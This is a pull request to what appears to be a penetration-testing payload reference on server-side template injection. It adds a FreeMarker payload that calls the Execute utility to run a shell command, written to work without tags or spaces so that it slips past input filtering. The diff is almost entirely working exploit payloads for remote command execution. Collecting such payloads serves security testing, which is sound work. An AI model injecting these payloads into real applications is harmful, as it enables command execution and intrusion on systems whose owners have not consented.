### PR TITLE
Added Freemarker SSTI PoC that doesn't require the use of "tags"/spaces

### DIFF
--- a/Server Side Template Injection/README.md
+++ b/Server Side Template Injection/README.md
@@ -150,6 +150,7 @@ The template can be `${3*3}` or the legacy `#{3*3}`
 ```js
 <#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
 [#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
+${"freemarker.template.utility.Execute"?new()("id")}
 ```
 
 ## Jade / Codepen


### PR DESCRIPTION
I came across a case where I was unable to use the go to PoC due to an inability to create "tags" (or use spaces) and surprisingly I couldn't find any other PoCs available. 

I modified the original PoC to work without needing those requirements, making it a little more reliable for the case of character sanitization/removal.